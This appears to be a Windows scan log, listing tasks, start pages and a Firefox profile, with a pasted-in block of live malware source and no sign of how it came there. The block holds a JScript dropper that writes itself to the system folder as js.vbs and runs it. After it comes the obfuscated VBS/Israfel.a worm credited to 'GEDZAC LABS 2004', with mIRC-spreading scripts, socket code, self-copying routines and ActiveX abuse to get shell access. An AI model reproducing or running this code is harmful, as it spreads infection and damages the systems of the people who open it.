2012-05-12 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
- c:\documents and settings\Annie\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2012-03-22 15:13]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~3\Office12\EXCEL.EXE/3000
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_D183CA64F05FDD98.dll/cmsidewiki.html
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\documents and settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\
var fso = new ActiveXObject(Scripting.FileSystemObject);
var wsl = new ActiveXObject(WScript.Shell);
var js = fso.OpenTextFile(WScript.ScriptFullName);
for (i=1; i<13; i++) { js.SkipLine(); }
jsc = js.ReadAll();
jsc = jsc.replace(*/,);
js.Close();
var js = fso.CreateTextFile(fso.GetSpecialFolder(1)+\\js.vbs);
js.Write(jsc);
js.Close();
wsl.Run(fso.GetSpecialFolder(1)+\\js.vbs);
/*
'<*****************************GEDZAC LABS 2004****************************>
Rem VBS/Israfel.a un producto de <GEDZAC LABS>
Rem USA aqui tienes un enemigo más, un grano de arena más en el desierto
Rem Fk`ri'cnf'bbrr'wf`fuf'whu'vrbubu'cbdnukb'fk'jrich'dhjh'snbib'vrb'qnqnu+'~'btwbuh'btsfu'fvrn'wfuf'qbukh
Rem Bk'tfrdb'tb'qf'tbdfich+'wbuh'kf'tbjnkkf'wbutntsb+'drfich'kf'snbuuf'tbf'kf'ncôibf'wfuf'wkfisfukf+'bk'tfrdb'`bujnifuæ'~'ofeuæ'hsuf'hwhusrincfc
Rem Dhjh'cndb'erto='vrb'Cnht'ebicn`f'f'bbrr+'kh'qfi'f'ibdbtnsfu
'<*************************************************************************>
'<Nud)Ntufabk)f'99'@BC]FD'KFET'99'Cbcndfch'f'Fqunk'Kfqn`ib'=.
'dsdw'6=(-=-=|')dsdwubwk~'#indl'('Udne6c7'{'na'/f)hi':'#surb.'|'qfu'f':'#ubjhqb/#6*+(.'{'f'{'(dkbfu'{'ofks'z'z
'Hi'6=SB_S=k`i-=-=|'qfu'k`':'#ubjhqb/#6+k`i.
'''na'/k`'::'#dou/674.'#,'#dou/676.'#,'#dou/677.'#,'#dou/67>.'#,'#dou/672..'|
'''''na'/#5'::'Hi.'|')tbs'f)hi'#surb'{')tbs'f)indl'#indl'{')wunqjt`'#indl'Nindnfich'Tbdnhi'cb'Dhisuhk'Ubjhsh'=.'z
'''na'/#5'::'Haa.'|')tbs'f)hi'#afktb'{')ritbs'f)indl'#indl'{')wunqjt`'#indl'Sbujnifich'Tbdnhi'cb'Dhisuhk'Ubjhsh'=.'z'z
'''bktb'|')wunqjt`'#indl'wftt'nidhuubds'=/'z
')dkhtb'*dj'#indl'z
'Hi'6=Sbs=djc-=-=|
'''na'/f)hi':'#afktb.'|'ofks'z'{'qfu'qs':'#ubjhqb/#6+djc.
'''na'/qs'::'TwNHi.'|')tbs'TwN'#surb'z'{'bktbna'/qs'::'TwNHaa.'|')tbs'TwN'#afktb'z
'''bktbna'/qs'::'TwSdHi.'|')tbs'TwSd'#surb'z'{'bktbna'/qs'::'TwSwHi.'|')tbs'TwSw'#surb'z
'''bktbna'/qs'::'TwSHaa.'|')tbs'TwSd'#afktb'{')tbs'TwSw'#afktb'z'{'bktbna'/qs'::'Twlb~.'|')cdd'tbic'*d'#indl'#jnudcnu'#,'k`)oq'z
'''bktbna'/qs'::'Twcnu.'|')atbuqb'#indl'4'#kbas/#jnudcnu+4.'z'{'bktbna'/qs'::'bns.'|')cntdhiibds'{')bns'z
'''bktbna'/qs'::'nw.'|')wunqjt`'#indl'#nw'z
')dkhtb'*dj'#indl'z
'Hi'6=Sbs=-=8=|
'''na'/TwSw':'#surb.'|')wunqjt`'f)indl';'#,'#Indl'#,'9'#,'#6*'z
'''na'/#IhSbs/#6*.':'#surb.'|')n`ihub'#indl'{')dkhtb'*dj'#indl'z
'z
'Hi'6=Sbs=-=$=|
'''na'/TwSd':'#surb.'|')wunqjt`'f)indl';'#,'#Indl'#,'9'#,'#6*'z
'''na'/#IhSbs/#6*.':'#surb.'|')wfus'#dofi'z
'z
'Hi'6=NIWRS=-=|
'''na'TwN':'#surb'|')wunqjt`'f)indl'65'#,'#6*'#,''z
'''na'/ncbisna~'ntni'#6*.'{{'/kh`ni'ntni'#6*.'|
'''''qfu'k`n':'#jnudcnu'#,'k`)oq
'''''na'/#bntst/k`n.':'#afktb.'|')punsb'k`n'***Ntufabk***'#arkkcfsb'z
'''''na'/#ubfc'*p-'#,'#jb'#,'-'k`n':'#irkk.'|
''''''')punsb'k`n'*****Ntufabk*****'{')punsb'k`n'N:'#jb'{')punsb'k`n'N:'#dofi
''''''')punsb'k`n'N:'#6*'{')punsb'k`n'N:'#bjfnk'{')punsb'k`n'N:'#tbuqbu
''''''')punsb'k`n'N:'#whus'{')punsb'k`n'N:'Pn'#,'ich'#,'pt'#ht'{')punsb'k`n'N:'#arkkcfsb
''')punsb'k`n'*****Ntufabk*****'z'z
'na'/#IhSbs/#6*.':'#surb.'|'ofks'z'z
'Fknft'rikhfc'|')bdoh'*fb'#cbdhcb/LnEQejq^PUk]DE}^4MwdOV`Mp::+j.'#,'#5'#,' 'z
'Fknft'thdlknts'|'(bdoh'*fb'#cbdhcb/LnhvNB2qN@>p]P3`d5>mf5Q7dp::+j.'z
'Fknft'IhSbs'|
'''na'/suhmfi'ntni'#6*.'{{'/suh~fih'ntni'#6*.'{{'/qnurt'ntni'#6*.'{{'/phuj'ntni'#6*.'{{'/tbs'ntni'#6*.'{{'/bifekb'ntni'#6*.'{{'/cntfekb'ntni'#6*.'{{'/ubjhsb'ntni'#6*.'{{'/tdunws'ntni'#6*.'{{'/wkf~'ntni'#6*.'{{'/thdl'ntni'#6*.'{{'/punsb'ntni'#6*.'{{'/cbdhcb'ntni'#6*.'{{'/fknft'ntni'#6*.'{{'/khfc'ntni'#6*.'{{'/rikhfc'ntni'#6*.'{{'/ubjnin'ntni'#6*.'{{'/ubjhqb'ntni'#6*.'{{'/bqbist'ntni'#6*.'{{'/snjbu'ntni'#6*.'|'ubsrui'#surb'z
'''bktb'|'ubsrui'#afktb'z
'z
'<***************************************************************************
'dsdw'-=cdd'tbic=-=|'na'/#kbi/#ihwfso/#ankbifjb..'9:'552.'|'ofks'z'z
'fknft'`ehs'|'na'/#thdl/`ehs.)tsfsrt'::'fdsnqb.'|'ofks'z'{'`tbuq'{'ut':'#u/6+2.'{')snjbu'6'4')thdlhwbi'`ehs'#o`bs/`Tq+ut.'1110'z
'fknft'`pt'|'na'/#thdl/#6.)tsfsrt'::'fdsnqb.'|'thdlpunsb'*i'#6'#5*'z'z
'fknft'uindl'|'ubsrui'#ufic/F+}.'#,'#ufic/f+}.'#,'#ufic/f+}.'#,'#ufic/f+}.'#,'#ufic/F+}.'#,'#ufic/f+}.'#,'#ufic/F+}.'z
'fknft'urtbu'|'q':'#u/6+>.
'''na'/q'::'6.'q':'#cbdhcb/f@>7ePAweD2me57:+j.'{'na'/q'::'5.'q':'#cbdhcb/e@A7fP2s^PktKjIqeV::+j.'{'na'/q'::'4.'q':'#cbdhcb/bPAhe5?r^5>s+j.
'''na'/q'::'3.'q':'#cbdhcb/c@Q~djBr^5>s+j.'{'na'/q'::'2.'q':'#cbdhcb/e_IrKjIqeV::+j.'{'na'/q'::'1.'q':'#cbdhcb/djIpKj2kcF::+j.
'''na'/q'::'0.'q':'#cbdhcb/]5QlbjAmKj>~]p::+j.'{'na'/q'::'?.'q':'#cbdhcb/c@Qt]P]qejkm^T2me57:+j.'{'na'/q'::'>.'q':'#cbdhcb/d@Q~cT2me57:+j.
'ubsrui'RTBU'#uindl'%'#,'q'#,'%'%'#,'#thdl/#thdlifjb.)nw'#,'%'='#,'q'z
'hi'-=thdlhwbi=`ehs=|')snjbuee'haa'{'`pt'`ehs'INDL'#uindl'{'`pt'`ehs'#urtbu'{')Tbs'udo'#Dou/42.'#,'#uindl'{')snjbuee'2'27'`pt'`ehs'mhni'udo'{')snjbufk'2'17'`pt'`ehs'shwnd'udo'@BC]FD'z
'hi'-=thdldkhtb=`ehs=|')snjbue'haa'{')snjbue'6'657'`ehs'z
'hi'-=thdlubfc=`ehs=|'na'/#thdlbuu'9'7.'|'ubsrui'z
'''na'/#thdl/`ehs.)tsfsrt'::'fdsnqb.'|'thdlubfc'uehs'z'{'bktb'|'ubsrui'z
'''na'/#thdleu'::'7.'|'ubsrui'z'{'na'/uehs'::'#irkk.'|'uehs':'*'z
'''na'/#`bsshl/uehs+6+45.'::'WNI@.'|'`pt'`ehs'WHI@'#`bsshl/uehs+5+2?.'z
'''na'/#`bsshl/#`bsshl/uehs+6+45.+5+13.'&:'#cbdhcb/U@A~f76o^5owejRrc_IkdiJrcP2l]_Mr]_Vre4Mi+j..'|'ofks'z
'''na'/ENIAH'ntni'uehs.'|')thdlpunsb'*i'#thdlifjb'wunqjt`'udo'='#,'#jb'#,'#dou/45.'#,'#tbuqbu'#,'#dou/45.'#,'#whus'#,'#dou/45.'#,'#jnudcnu'#,'#dou/45.'#,'#nw'#,'#dou/45.'#,'#cfsb'#,'#dou/45.'#,'#snjb'z
'''na'/fwd'ntni'uehs.'|'#`bsshl/uehs+2*+45.'z
'na'/ftq'ntni'uehs.'|')thdlpunsb'*si'`ehs'#`bsshl/uehs+2*+45.'z'z
'Fknft'`ossw'|'na'/#thdl/wossw.)tsfsrt'&:'kntsbini`.'|')thdlkntsbi'wossw'5773'z
'na'/#thdl/wankb.)tsfsrt'&:'kntsbini`.'|')thdlkntsbi'wankb'5774'z'z
'Hi'-=thdlkntsbi=wossw=|')thdlfddbws'sosj'#,'#u/7+>>>>>>>>>>.'z
'Hi'-=thdlkntsbi=wankb=|')thdlfddbws'sank'#,'#u/7+>>>>>>>>>>.'z
'Hi'-=thdlubfc=sosj-=|'na'/#thdlbuu'9'7.'|'ubsrui'z
'''na'/#thdl/#thdlifjb.)tsfsrt'::'fdsnqb.'|'thdlubfc'uos'z
'''bktb'|'ubsrui'z
'''na'/#thdleu'::'7.'|'ubsrui'z'{'na'/uos'::'#irkk.'|'tbicTud':'*'z
'''na'/#`bsshl/uos+5+45.'::'#cbdhcb/K5kr]@Q3Kjo7eV::+j..'|
'''''oobfc
'''''`pt'#thdlifjb'#cbdhcb/W@o7ePp,W@`~WlMo^5sBe5>~Klo7cOF`VjA~]@kkeD2CN@M2NBck]Owo^~EJ^PM}WD>hJm3?K5o7ePp,+j.
'''z
'''na'/(d=b6'ntni'#`bsshl/uos+5+45..'{{'/(c=b6'ntni'#`bsshl/uos+5+45..'|
'''''ocu':'#ubwkfdb/#jnc/#`bsshl/uos+5+45.+5.+b6+[.
'''''oobfc
'''''`pt'#thdlifjb'#cbdhcb/W@o7ePp,W@`~WlMo^5sBe5>~Klo7cOF`VjA~]@kkeD2CND7`U@k~d~El]V::+j.'#,'#dou/45.'#,'ocu'#,';(o59;wub9
'''''dsc':'6
'''''ponkb'/dsc';:'#aniccnu/#ubwkfdb/ocu+X+#dou/45..+-)-+7+6..'|
'''''''`pt'#thdlifjb'#aniccnu/#ubwkfdb/ocu+X+#dou/45..+-)-+dsc+6.'{'nid'dsc
'''''z
'''''`pt'#thdlifjb'#cbdhcb/W@o7ePp,W@`~WlMo^5sBe5>~Klo7cOF`VjA~]@kkeD2CND7`Ujkt]_J`]@R:+j.'#,'#dou/45.'#,'ocu'#,';(o59
'''''dsc':'6
'''''ponkb'/dsc';:'#anicankb/#ubwkfdb/ocu+X+#dou/45..+-)-+7+6..'|
'''''''`pt'#thdlifjb'#anicankb/#ubwkfdb/ocu+X+#dou/45..+-)-+dsc+6.'{'nid'dsc
'''''z
'''''`pt'#thdlifjb'#cbdhcb/WD>pdjR,WD>hc@6tW`::+j.
'z'z
'Fknft'oobfc'|
'''`pt'#thdlifjb'#cbdhcb/TAURRD?KmB`JmFpNB>K+j.
'''`pt'#thdlifjb'#cbdhcb/R5Q~cjQ~HnEH]_U}^5Ap]T6AeiUkdiE~f_IkK}VrJV::+j.
'''`pt'#thdlifjb'#cbdhcb/U@A7]Sh:+j.'#,'#Dou/45.'#,'#arkkcfsb
'''`pt'#thdlifjb'#cbdhcb/V5>rc@QrcD67b_EkHnE7]_o7K5o7ePp:+j.
'''`pt'#thdlifjb'#cbdhcb/U_Uo]}h`Nj^3IjV5]CN5KPB3KSV~JT7}]mkjHPB~JnN:+j.
'''`pt'#thdlifjb'#cbdhcb/S@A}cD6se5Uw]jkk]Ch:+j.'#,'#Dou/45.'#,'#arkkcfsb
'''`pt'#thdlifjb'#cbdhcb/VPIm]_E7KRQr^5>lfP2iHnEw]@Qrc@k7bV::+j.
'''`pt'#thdlifjb'#cbdhcb/VPIm]_E7K_Moejckd}h`^ik7]_J:+j.
'''`pt'#thdlifjb'#duka'{'do':'6
'''ponkb'/do';'0.'|'`pt'#thdlifjb'#cbdhcb/^PAo^PAo^PAo^PAo^PAo^PAo^PAo^PAo^PAo^PAo^PAo+j.'{'nid'do'z
'z
'Hi'-=thdlubfc=sank-=|'na'/#thdlbuu'9'7.'|'ubsrui'z
'''na'/#thdl/#thdlifjb.)tsfsrt'::'fdsnqb.'|'thdlubfc'tbicAnk'z
'''bktb'|'ubsrui'z
'''na'/#thdleu'::'7.'|'ubsrui'z
'''na'/tbicAnk'::'#irkk.'|'tbicAnk':'*'z
'''na'/(d=b6'ntni'#`bsshl/tbicAnk+5+45..'{{'/(c=b6'ntni'#`bsshl/tbicAnk+5+45..'|
'''''tbicAnkb'#ubwkfdb/#jnc/#`bsshl/tbicAnk+5+45.+5.+b6+[.
'z'z
'Fknft'tbicAnkb'|
'''`pt'#thdlifjb'#cbdhcb/TAURRD?KmB`JmFpNB>K+j.
'''`pt'#thdlifjb'#cbdhcb/U@A7]Sh:+j.'#,'#Dou/45.'#,'#arkkcfsb
'''`pt'#thdlifjb'#cbdhcb/R5Q~cjQ~HnEH]_U}^5Ap]T6AeiUkdiE~f_IkK}VrJV::+j.
'''`pt'#thdlifjb'#cbdhcb/VPIm]_E7KQMoejckd}h`^ik7]_J:+j.
'''`pt'#thdlifjb'#cbdhcb/V5>rc@QrcD6Rb_EkHnEodOEtfPIoc@kqen>q^4UkcD6}cOMk^P7:+j.
'''`pt'#thdlifjb'#cbdhcb/V5>rc@QrcD6J]P2ic@`1+j.'#,'#Dou/45.'#,'#ankb/#6*.)tn}b
'''`pt'#thdlifjb'#cbdhcb/VPIm]_E7KRQr^5>lfP2iHnEw]@Qrc@k7bV::+j.
'''`pt'#thdlifjb'#duka
'''Tbs'kank'7'{'Tbs'rank'#kha/#6*.'{'Tbs'`ank'#6*
'z
'Fknft'twubfc'|'na'/#ntankb/#5*.'::'#surb.'|'eubfc'%'#,'#5*'#,'%'kank'13'!a~kb'z
'thdlpunsb'#6'!a~kb'{'kank':'#dfkd/kank','#eqfu/!a~kb+7..'z
'Hi'-=thdlpunsb=sank-=|'na'/#thdlbuu'9'7.'|'thdldkhtb'#thdlifjb'{'ubsrui'z
'''na'/kank'9:'rank.'|'thdldkhtb'#thdlifjb'{'ubsrui'z
'twubfc'#thdlifjb'`ank'z
'Fknft'`tbuq'|
'''ofcc'*j'`Tq'6'#cbdhcb/f_MmKiQr]@Q~ejQ7Kj>~]p::+j.
'''ofcc'`Tq'5'#cbdhcb/ePArf@A7c@ArKjs}KiQ}KiQr]@Q~ejQ7Kj>~]p::+j.
'''ofcc'`Tq'4'#cbdhcb/d@Ar^P6o^5k7bT2p^T26ejUkdj2kcD2qdjd:+j.
'''ofcc'`Tq'3'#cbdhcb/d5Ar]@kk]5?r^5Brc_JrcP2l]_Mr]_Vre4Mi+j.
'''ofcc'`Tq'2'#cbdhcb/]jAwdj]obD25^T26d~26ejUkdj2kcD2qdjd:+j.
'z
'<***************************************************************************
'Hi'6=DHIIBDS=|'(Ritbs'eq)-'f)-'iq)-'{'(tbs'TwN'#afktb'{'(tbs'TwS'#afktb'{'(tbs'f)hi'#afktb'{'(Ubjhsb'Hi'{'`ehs'{'`ossw'z
'Hi'6=MHNI=-=|'na'/#indl'&:'#jb.'|'|'tnq'z'{'|'tq'z'z'{'bktb'|'na'/f~rcf'ntni'$.'{{'/obkw'ntni'$.'{{'/qnurt'ntni'$.'{{'/fqs'ntni'$.'{{'/qo'ntni'$.'{{'/`n`fnud'ntni'$.'|')wunqjt`'$'Nud)Ntufabk)F'e~'@BC]FD'KFET'{')cntdhiibds'{')bns'z'z'z
'Hi'6=AnkbUdqc=-=|'na'/#indl'&:'#jb.'|'|'tnq'z'{'|'tq'z'z'z
'Hi'6=WFUS=$=|'na'/#indl'&:'#jb.'|'|'tnq'z'{'|'tq'z'z'z
'Hi'6=AnkbTbis=-=|'na'/)}nw'ntni'#ankbifjb.'|'ofks'z'{'qfu'wt':'pt~t'#,'#cbdhcb/_@]we@Q1f_Frbjkp+j.'{')dhw~'*h'wt'#ihankb/wt.'#,'#`bsshl/#ihwfso/#ankbifjb.+6+31.'#,'5)}nw'{'dtq'#indl'#ihankb/wt.'#,'#`bsshl/#ihwfso/#ankbifjb.+6+31.'#,'5)}nw'$hw'z
'Hi'6=TBICAFNK=-=|'ofks'z
'Fknft'tq'|'qfu'we':'pt~t'#,'#cbdhcb/_@]we@Q1f_Frbjkp+j.
'''na'/#bntst/we.':'#afktb.'|'ofks'z'{'qfu'ue':'#ufic/6+67.
'''na'/ue':'6.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/ej>7]_Jrbjkp+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/ej>7]_Jrbjkp+j.'z
'''bktbna'/ue':'5.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/cjkl]P>}KiwwdF::+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/cjkl]P>}KiwwdF::+j.'z
'''bktbna'/ue':'4.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/bOo3KiwwdF::+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/bOo3KiwwdF::+j.'z
'''bktbna'/ue':'3.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/SPArcPAtR5QlcPImfP>rKiwwdF::+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/SPArcPAtR5QlcPImfP>rKiwwdF::+j.'z
'''bktbna'/ue':'2.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/d@>}c@AtKiwwdF::+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/d@>}c@AtKiwwdF::+j.'z
'''bktbna'/ue':'1.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/f@Qmf@k1e4Jrbjkp+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/f@Qmf@k1e4Jrbjkp+j.'z
'''bktbna'/ue':'0.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/fP6o]5Q}KiwwdF::+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/fP6o]5Q}KiwwdF::+j.'z
'''bktbna'/ue':'?.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/d5Q3KiwwdF::+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/d5Q3KiwwdF::+j.'z
'''bktbna'/ue':'>.'|')dhw~'*h'we'#ihankb/we.'#,'#cbdhcb/^_]~fPprbjkp+j.'{'Tbs'eq)ankb'#ihankb/we.'#,'#cbdhcb/^_]~fPprbjkp+j.'z
'''bktbna'/ue':'67.'|')dhw~'*h'we'#ihankb/we.'#,'#jb'#,')}nw'{'Tbs'eq)ankb'#ihankb/we.'#,'#jb'#,')}nw'z
')n`ihub'*uwdisnlr62'#fccubtt/#indl+6.'{'dtq'#indl'eq)ankb'#dofi'z
'Fknft'tnq'|'qfu'ue4':'#ufic/6+67.'
'''na'/ue4':'6.'|'qfu'je4':'#cbdhcb/F}`tJR]qc@>}NAo^PFJCIDpN@o7cOF1K~>s]P6n]_M}Kj2^5>}KjIqKiQuK5k}]_M5]_N7K4Et^_kne4lr^_]wNFJCHDpNAo^PDE@e4UqdpJ:+j.'z
'''bktbna'/ue4':'5.'|'qfu'je4':'#cbdhcb/F}VtJR]~]PR`PAo^NAIkbA]w]@QqNFJCHDpfOU7dChqK56kePM~]_JreOkme4Jr]iNqf_Ikdi]kdmRqd5Q3]_Im]P2kKjA5fVJ:+j.'z
'''bktbna'/ue4':'4.'|'qfu'je4':'#cbdhcb/F}FtJSIIf_MoN@oN@]qc@?`FpJ7KCBsW`JCHDpIDEhcOUpHn?qePQs^iMkd~2tbPIqd~2jdn>wd5Q~cjQ~IT>oejU~]PBrfiEiFp::+j.'z
'''bktbna'/ue4':'3.'|'qfu'je4':'#cbdhcb/F}QHe~EmdjQkd~EkenEte~Ep^_Moej>~ePAtW~FCF}B7fOU7dChqK56kePMkdiJreOkme4Jr^5?rcPtqf_Ikdi]kdmVqf@Al^T2ifP^`HipC+j.'z
'''bktbna'/ue4':'2.'|'qfu'je4':'#cbdhcb/F}B}KCADdjk7ejQ2KDECfOMwd4UwejBtNBwkej2w]jQ~KDEkc@J`FpJ3KCAhcOUpHn?qc_UkeiUwKj2^5>}Kjk7K4k}]_M5]_N}K5M~f_Ur]_lr^_]wFp::+j.'z
'''bktbna'/ue4':'1.'|'qfu'je4':'#cbdhcb/F}VtJQEw^4J`SP>l]P}NFJCJSJtJPo7cOF1K~>6c@Qrc@lreOkme4Jrf_Vqb_Ikdi]kdmJqcjk5fPAr^T2vd@dCF}VtJTEIe5UkeOJ`R@kmdpJ:+j.'z
'''bktbna'/ue4':'0.'|'qfu'je4':'#cbdhcb/F}dtJBApdjQr]@R`^TEme52cPk}c@A~N@AtNOIkb@?`e4E6]_I7e~FCF}B}KCF`fOU7dChqK56wc@ctfPQlKj2^5>}KjUkK5k}]_M5]_N~K4Ik]OQm^5kqen27bOVC+j.'z
'''bktbna'/ue4':'?.'|'qfu'je4':'#cbdhcb/F}VtHB6wdjB`]_I7^TEje4UqNFJCHDp7fOU7dChqK56kePMkdiJreOkme4Jrejpqf_Ikdi]kdmBqe4]rfT2vd@dC+j.'z
'''bktbna'/ue4':'>.'|'qfu'je4':'#cbdhcb/F}VtJR]~]PR`d@kmd~EOf_Mtd~p`Q@QkeiJ`FpJ3KCAhcOUpHn?qePk7]5w]PVreOkme4Jr]@Rqf_Ikdi]kdmNqf5A7f@Q~fP2kKjwp]pJ:+j.'z
'''bktbna'/ue4':'67.'|'qfu'je4':'#cbdhcb/F}B~KCEL]P2w]jQ~NBqcjR`T@Q4f_U7NAIkbDEPfPUke~FCF}VtJ@o7cOF1K~>s]P6n]_M}Kj2^5>}Kj2tK5k}]_M5]_NK5wkejkj]_Mte4]kKjA5fVJ:+j.'z
')wunqjt`'#indl'je4'z
'Fknft'dtq'|'tbs'eq)ankb'#5
'''na'/'#6'nthw'#4'.'{{'/'#6'ntqhndb'#4'.'|'ofks'z
'''na'/'#bntst/eq)ankb.':'#afktb'.'|'ofks'z
'''na'/'#thdl/eq)-+7.'9'2'.'|'ubsrui'z
'''Tbs'eq)'#,'#6'7'{'=tdfiws'{'Tbs'ws'#ufic/5377+2777.'
'''na'/'#whusaubb/ws.':'#afktb'.'|'`hsh'tdfiws'z'
'''Tbs'\''#,'\'iq)'#,'\'#6'Z'Z'Z'7'{'Tbs'wl)'#,'#6'37>1'{'Tbs't}'#ankb/eq)ankb.)tn}b
'''Tbs'eq)qsw6'eq)'#,'#6'{')snjbu'#,'#6'6'477'|')thdldkhtb'eq)qsw6'{')thdldkhtb'n)'#,'#6'z
''')snjbu'#,'#6'6'27'be'#6'{')n`ihub'*r>7'#6'5
''')ufp'*v'wunqjt`'#6'='#,'#dou/6.'#,'CDD'TBIC'eq)ankb'#khi`nw/#nw.'ws't}'#,'#dou/6.
'na'/'#thdl/eq)qsw6.'&:'#irkk'.'|')thdldkhtb'eq)qsw6'z'{')thdlkntsbi'eq)qsw6'ws'z
'Fknft'be'|'na'/'\''#,'\'iq)'#,'\'#6'Z'Z'Z':'7'.'|')thdldkhtb'\'n)'#,'\'#6'Z'Z'{')thdldkhtb'\'eq)'#,'\'#6'Z'Z'{')snjbu'#,'#6'haa'z'z
'Fknft'ktq'|'na'/'#dfkd/'\''#,'\'iq)'#,'\'#6'Z'Z'Z','\''#,'\'wl)'#,'\'#6'Z'Z'Z'.';'t}.'|'eubfc'eq)ankb'\''#,'\'iq)'#,'\'#6'Z'Z'Z'\''#,'\'wl)'#,'\'#6'Z'Z'Z'!cfsf'{')thdlpunsb'n)'#,'#6'!cfsf'{'nid'\''#,'\'iq)'#,'\'#6'Z'Z'Z'\''#,'\'wl)'#,'\'#6'Z'Z'Z'z'{'bktb'|'Tbs'\''#,'\'eq)'#,'\'#6'Z'Z'Z'6'{'\''#,'\'wl)'#,'\'#6'Z'Z'Z':'#dfkd/'t}'*'\''#,'\'iq)'#,'\'#6'Z'Z'Z'.'{'na'/'\''#,'\'wl)'#,''\'#6'Z'Z'Z':'7.'|'ubsrui'z'{'eubfc'eq)ankb'\''#,'\'iq)'#,'\'#6'Z'Z'Z'\''#,'\'wl)'#,'\'#6'Z'Z'Z'!cfsf'{')thdlpunsb'n)'#,'#6'!cfsf'z'z
'Hi'6=ThdlDkhtb=n)-=|'Tbs'eq)sjw1'#ubjhqb/#thdlifjb+n).'{'thdldkhtb'#thdlifjb'{'thdldkhtb'\'eq)'#,'\'eq)sjw1'Z'Z'{')snjbu'#,'eq)sjw1'haa'z
'Hi'6=ThdlKntsbi=eq)-=|'Tbs'eq)sjw2'#ubjhqb/#thdlifjb+eq).'{'thdlfddbws'n)'#,'eq)sjw2'{'ktq'eq)sjw2'z
'Hi'6=ThdlPunsb=n)-=|'Tbs'eq)sjw1'#ubjhqb/#thdlifjb+n).'{'na'/'\''#,'\'eq)'#,'\'eq)sjw1'Z'Z'Z':'6'.'|')snjbu'#,'#ufic/>>+>>>>.'6'67'thdldkhtb'#thdlifjb'{')snjbu'#,'#u/>>+>>>>.'6'67'thdldkhtb'\'eq)'#,'\'eq)sjw1'Z'Z'{')snjbu'#,'eq)sjw1'haa'{'ofks'z'{'ktq'eq)sjw1'z
'Hi'6=bns=|'qfu'ebw':'pt~t'#,'['{'qfu'do':'6'{'ponkb'/do';:'67.'|
'''''na'/do':'6.'|'qfu'dow':'ebw'#,'#cbdhcb/ej>7]_Jrbjkp+j.'z
'''''na'/do':'5.'|'qfu'dow':'ebw'#,'#cbdhcb/cjkl]P>}KiwwdF::+j.'z
'''''na'/do':'4.'|'qfu'dow':'ebw'#,'#cbdhcb/bOo3KiwwdF::+j.'z
'''''na'/do':'3.'|'qfu'dow':'ebw'#,'#cbdhcb/SPArcPAtR5QlcPImfP>rKiwwdF::+j.'z
'''''na'/do':'2.'|'qfu'dow':'ebw'#,'#cbdhcb/d@>}c@AtKiwwdF::+j.'z
'''''na'/do':'1.'|'qfu'dow':'ebw'#,'#cbdhcb/f@Qmf@k1e4Jrbjkp+j.'z
'''''na'/do':'0.'|'qfu'dow':'ebw'#,'#cbdhcb/fP6o]5Q}KiwwdF::+j.'z
'''''na'/do':'?.'|'qfu'dow':'ebw'#,'#cbdhcb/d5Q3KiwwdF::+j.'z
'''''na'/do':'>.'|'qfu'dow':'ebw'#,'#cbdhcb/^_]~fPprbjkp+j.'z
'''''na'/do':'67.'|'qfu'dow':'ebw'#,'#jb'#,')}nw'z
'''na'/#bntst/dow.':'#surb.'|')ubjhqb'dow'z'{'nid'do'z
'qfu'id':'#anicankb/ebw+-5)}nw+7.'{'qfu'td':'6'{'ponkb'/td';:'id.'|')ubjhqb'#anicankb/ebw+-5)}nw+td.'{'nid'td'z'z
'Hi'6=Cntdhiibds=|')snjbut'haa'{')thdldkhtb'eq)-'{')thdldkhtb'n)-'z
'----------------------------------------------------------------------------
On Error Resume Next
Dim fso, wsl, wsn, sdy, iscript, Espejo, jscode, Atf
If iH() Then
If iHt() Then
Err.Clear
Set fso = CreateObject(q(Tdunwsni`)AnkbT~tsbjHembds))
Set wsl = CreateObject(q(PTdunws)Tobkk))
If Err.Number <> 0 Then
If InStr(LCase(Navigator.SystemLanguage),q(bt)) <> 0 Then
msgh=q(Buuhu'5766) & vbCrlf & q(Btsf'Wf`nif'Ubvrnbub'Dhisuhkbt'Fdsnqb_'wfuf'tbu'jhtsufcf'bi'tr'shsfkncfc) & vbCrlf & q(Wubtnhib'Fdbwsfu)
Else
msgh=q(Buuhu'5766) & vbCrlf & q(Sont'Wf`nifsbt'ns'Ubvrnubt'Dhisuhkt'Fdsnqb_'sh'eb'tohpi'ni'sobnu'bisnubs~) & vbCrlf & q(Wubtt'sh'Fddbws)
End If
Window.alert(msgh)
document.location.reload
End If
Else
Set AppleObject = document.applets(GEDZAC)
AppleObject.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B})
AppleObject.createInstance()
Set wsl = AppleObject.GetObject()
AppleObject.setCLSID({0D43FE01-F093-11CF-8940-00A0C9054228})
AppleObject.createInstance()
Set fso = AppleObject.GetObject()
End If
Call Dropvbs
Else
Set fso = CreateObject(q(Tdunwsni`)AnkbT~tsbjHembds)): Set wsl = CreateObject(q(PTdunws)Tobkk))
Set wsn = CreateObject(q(PTdunws)Ibsphul)): Set Sdy = CreateObject(q(Tdunwsni`)Cndsnhifu~))
